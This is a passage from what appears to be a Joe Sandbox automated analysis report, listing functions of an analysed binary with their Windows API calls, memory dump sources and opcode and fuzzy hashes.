                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 521402451-0
                                                                                                                                                  • Opcode ID: 32862a8134e4ddf22795054a0d4e9e2bb6678af33b5d74ee6b039ece6cc5e12e
                                                                                                                                                  • Instruction ID: f992fc0480c29b649a3a517e5844fc8f2d6704c02483f380a13e7abaa1b39e41
                                                                                                                                                  • Opcode Fuzzy Hash: 32862a8134e4ddf22795054a0d4e9e2bb6678af33b5d74ee6b039ece6cc5e12e
                                                                                                                                                  • Instruction Fuzzy Hash: EA1127319041447FC708B7A6AC42ABEB7E9DF41321F2401DAF10557282EF715D8697A1
                                                                                                                                                  Function 00C19274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C18D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C18D3F
                                                                                                                                                    • Part of subcall function 00C18D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C18D49
                                                                                                                                                    • Part of subcall function 00C18D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18D58
                                                                                                                                                    • Part of subcall function 00C18D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18D5F
                                                                                                                                                    • Part of subcall function 00C18D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18D75
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C192C1
                                                                                                                                                  • _memcmp.LIBCMT ref: 00C192E4
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C1931A
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00C19321
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1592001646-0
                                                                                                                                                  • Opcode ID: 24b98a4525f4431551b2dc4fa73096d64fa752d3292374ef41e93067602bf16f
                                                                                                                                                  • Instruction ID: 6a55c00bee149d975d224df4b62ec6f788ec899d05b29359dada73aa4665a173
                                                                                                                                                  • Opcode Fuzzy Hash: 24b98a4525f4431551b2dc4fa73096d64fa752d3292374ef41e93067602bf16f
                                                                                                                                                  • Instruction Fuzzy Hash: FB21CF71E00209EFCB10DFA4C955BEEB7F8FF46301F144099E865A72A0D770AA85EB90
                                                                                                                                                  Function 00C4634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC,00000001), ref: 00C463BD
                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C463D7
                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C463E5
                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C463F3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2169480361-0
                                                                                                                                                  • Opcode ID: 19b489f4ba7aeca3acf0e60a31fc994c3c052bc16d3789823e0afce92052b55f
                                                                                                                                                  • Instruction ID: 8f33d3c8f9c927c5effc2cfe22f6172ddd0b9adf62fc90b01fea5c3e566e31ec
                                                                                                                                                  • Opcode Fuzzy Hash: 19b489f4ba7aeca3acf0e60a31fc994c3c052bc16d3789823e0afce92052b55f
                                                                                                                                                  • Instruction Fuzzy Hash: A511AC35305514AFD705AB24CC55FBE77A9EF86320F24421CF926DB2E2CBA0AD418B95
                                                                                                                                                  Function 00C1E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C1F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C1E46F,?,?,?,00C1F262,00000000,000000EF,00000119,?,?), ref: 00C1F867
                                                                                                                                                    • Part of subcall function 00C1F858: lstrcpyW.KERNEL32(00000000,?,?,00C1E46F,?,?,?,00C1F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C1F88D
                                                                                                                                                    • Part of subcall function 00C1F858: lstrcmpiW.KERNEL32(00000000,?,00C1E46F,?,?,?,00C1F262,00000000,000000EF,00000119,?,?), ref: 00C1F8BE
                                                                                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C1F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C1E488
                                                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00C1F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C1E4AE
                                                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C1F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C1E4E2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                  • String ID: cdecl
                                                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                                                  • Opcode ID: fdd8c5a5439ae7953db38fc34d01d6bd4d7e2f81eba0c373b8949cda14ef1d06
                                                                                                                                                  • Instruction ID: 5a4b946fae539c81386b92e4ca1e63caf3a3b31c6b0b6c8869450d7882ca5ab5
                                                                                                                                                  • Opcode Fuzzy Hash: fdd8c5a5439ae7953db38fc34d01d6bd4d7e2f81eba0c373b8949cda14ef1d06
                                                                                                                                                  • Instruction Fuzzy Hash: 2A11D03A200345AFDB25AF64DC45EBE77A9FF46350B50402AF806CB2A0EB71D991E7D1
                                                                                                                                                  Function 00BF5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _free.LIBCMT ref: 00BF5331
                                                                                                                                                    • Part of subcall function 00BE593C: __FF_MSGBANNER.LIBCMT ref: 00BE5953
                                                                                                                                                    • Part of subcall function 00BE593C: __NMSG_WRITE.LIBCMT ref: 00BE595A
                                                                                                                                                    • Part of subcall function 00BE593C: HeapAlloc.KERNEL32(016E0000,00000000,00000001,?,00000004,?,?,00BE1003,?), ref: 00BE597F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocHeap_free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1080816511-0
                                                                                                                                                  • Opcode ID: 9e62285512a6c63cba252755ca4e7f7752a2d1065c6ae40ffadac5728e530685
                                                                                                                                                  • Instruction ID: 8dbf9c8c18882ac10d4445bc43ef91d3226b2ea66f593a551e2402feac2c2b7f
                                                                                                                                                  • Opcode Fuzzy Hash: 9e62285512a6c63cba252755ca4e7f7752a2d1065c6ae40ffadac5728e530685
                                                                                                                                                  • Instruction Fuzzy Hash: F411EB32505E1DEFCB302F79AC457AE37D49F103A2B2045A9F74AA71A1DF7089449794
                                                                                                                                                  Function 00C24365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C24385
                                                                                                                                                  • _memset.LIBCMT ref: 00C243A6
                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00C243F8
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00C24401
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1157408455-0
                                                                                                                                                  • Opcode ID: 12c84201aab45d724519b69b2635d4347853b7916ccb70ff160a54dd8539834d
                                                                                                                                                  • Instruction ID: 50dc51f3556e891fed523777f048babe0f8f09f47cedfb23e8c5e552dd850a17
                                                                                                                                                  • Opcode Fuzzy Hash: 12c84201aab45d724519b69b2635d4347853b7916ccb70ff160a54dd8539834d
                                                                                                                                                  • Instruction Fuzzy Hash: 5111A775901328BAD7309BA5AC4DFAFBB7CEF45760F10459AF908E7190D6744F808BA4
                                                                                                                                                  Function 00C36A54 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C27E51,?,?,00000000), ref: 00BD4041
                                                                                                                                                    • Part of subcall function 00BD402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C27E51,?,?,00000000,?,?), ref: 00BD4065
                                                                                                                                                  • #52.WSOCK32(?,?,?), ref: 00C36A84
                                                                                                                                                  • #111.WSOCK32(00000000), ref: 00C36A8F
                                                                                                                                                  • _memmove.LIBCMT ref: 00C36ABC
                                                                                                                                                  • #11.WSOCK32(?), ref: 00C36AC7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide$#111_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 70051993-0
                                                                                                                                                  • Opcode ID: b23634eb28ab0fa9097dd5e1fd887144aea852227bf21fe3df800b391d27b56f
                                                                                                                                                  • Instruction ID: 83260d5e38c6fe15d04c6763e9ea6a8f7759294f9d332303dcbfb2aa1201c128
                                                                                                                                                  • Opcode Fuzzy Hash: b23634eb28ab0fa9097dd5e1fd887144aea852227bf21fe3df800b391d27b56f
                                                                                                                                                  • Instruction Fuzzy Hash: 83115175500108AFCB00FBA4CD56DEEB7F8EF14311B1481A5F506A72A2DF309E44DBA1
                                                                                                                                                  Function 00C196F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C19719
                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000,?,000000B0,?,?), ref: 00C1972B
                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000B0,?,?), ref: 00C19741
                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000B0,?,?), ref: 00C1975C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                  • Opcode ID: 73fd3e2f1eb3ed5067952f08e9704fab47d51834f2d790d881750ca86c245f63
                                                                                                                                                  • Instruction ID: ea41574e97bc576e935f9ce6a00462f53a5f4e519308ec72490b7de8b2cb787b
                                                                                                                                                  • Opcode Fuzzy Hash: 73fd3e2f1eb3ed5067952f08e9704fab47d51834f2d790d881750ca86c245f63
                                                                                                                                                  • Instruction Fuzzy Hash: C8113639900218BFEB10DF95C984EEDBBB8FF49710F204091E900B7290D6716E51EB90
                                                                                                                                                  Function 00BC166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1CE4,?), ref: 00BC29F3
                                                                                                                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00BC16B4
                                                                                                                                                  • GetClientRect.USER32(?,?,?,?,?), ref: 00BFB93C
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00BFB946
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00BFB951
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4127811313-0
                                                                                                                                                  • Opcode ID: bb8526cbe2258c7d5ddd2db1f8577b8cd2284f6432d3e605534a8e80f8e22d55
                                                                                                                                                  • Instruction ID: 43d4b35219ddc92f134fea14f37239cf06ce6c16a28368d4e6f8778223d45068
                                                                                                                                                  • Opcode Fuzzy Hash: bb8526cbe2258c7d5ddd2db1f8577b8cd2284f6432d3e605534a8e80f8e22d55
                                                                                                                                                  • Instruction Fuzzy Hash: F7111679A00119ABCB00EF98C885EBE77B8FB05301F6408A9F951E7151D730AA91CBA5
                                                                                                                                                  Function 00BC2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,00BC2004), ref: 00BC214F
                                                                                                                                                  • GetStockObject.GDI32(00000011,00000000,?,00000096,?,00BC2004,?,?,static,00C50980,?,?,?,00000096,00000096,?), ref: 00BC2163
                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,00BC2004,?,?,static,00C50980,?,?,?,00000096,00000096), ref: 00BC216D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3970641297-0
                                                                                                                                                  • Opcode ID: 4aa97f2252297136a4aaf58e64e64b816c7c577a66a7134ff553443e8b75e9a7
                                                                                                                                                  • Instruction ID: 05b39abce421387bad1fbbe4216f16444e8c7433434c1865e2ce3cce18d16fb5
                                                                                                                                                  • Opcode Fuzzy Hash: 4aa97f2252297136a4aaf58e64e64b816c7c577a66a7134ff553443e8b75e9a7
                                                                                                                                                  • Instruction Fuzzy Hash: 23117972501649BFDB024F90DC84FEA7BA9EF58795F190149FB04A2010C7319CA0DBA0
                                                                                                                                                  Function 00C21941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C204EC,?,00C2153F,?,00008000), ref: 00C2195E
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C204EC,?,00C2153F,?,00008000), ref: 00C21983
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C204EC,?,00C2153F,?,00008000), ref: 00C2198D
                                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00C204EC,?,00C2153F,?,00008000), ref: 00C219C0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2875609808-0
                                                                                                                                                  • Opcode ID: 247bf9cff8d453a14b34b319cccd886f322b55c100b69a0bc5a994eea7670abc
                                                                                                                                                  • Instruction ID: b12539de6cd8cd16c5671d009f2a765cb87b1cd6d9e32a44e816eb6cdeb9d24b
                                                                                                                                                  • Opcode Fuzzy Hash: 247bf9cff8d453a14b34b319cccd886f322b55c100b69a0bc5a994eea7670abc
                                                                                                                                                  • Instruction Fuzzy Hash: C3111835D04A29DBCF00AFA5E998BEEBB78BF18752F154155ED80B2240CB3096D08B92
                                                                                                                                                  Function 00C4E1CE Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C4E1EA
                                                                                                                                                  • #183.OLEAUT32(?,00000002,0000000C), ref: 00C4E201
                                                                                                                                                  • #163.OLEAUT32(0000000C,?,00000000), ref: 00C4E216
                                                                                                                                                  • #442.OLEAUT32(0000000C,?,00000000), ref: 00C4E234
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: #163#183#442FileModuleName
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2875472535-0
                                                                                                                                                  • Opcode ID: 6b24640583fe1795791c78f42d2d60069eaf86ff1f05ed8debb2215f63f33456
                                                                                                                                                  • Instruction ID: 7cdd6483bc4d1d00a014a542cecb67d83bec5916d6c378f9a2fcf57a891c1ab9
                                                                                                                                                  • Opcode Fuzzy Hash: 6b24640583fe1795791c78f42d2d60069eaf86ff1f05ed8debb2215f63f33456
                                                                                                                                                  • Instruction Fuzzy Hash: 6C115EB52053149BE3308F51ED0CF97BBBCFB00B00F118559AA16D6051D7B0E544DBA1
                                                                                                                                                  Function 00BF71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                  • Instruction ID: 9e3d2c62a92db78cc5797dd233915ab6cf46b8c24a1dec301639d6d6c0870e8a
                                                                                                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                  • Instruction Fuzzy Hash: A901803208814EBBCF125E84CC418ED3FA2FB1A340B088595FB185A131CB37C9B5AB81
                                                                                                                                                  Function 00C4B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
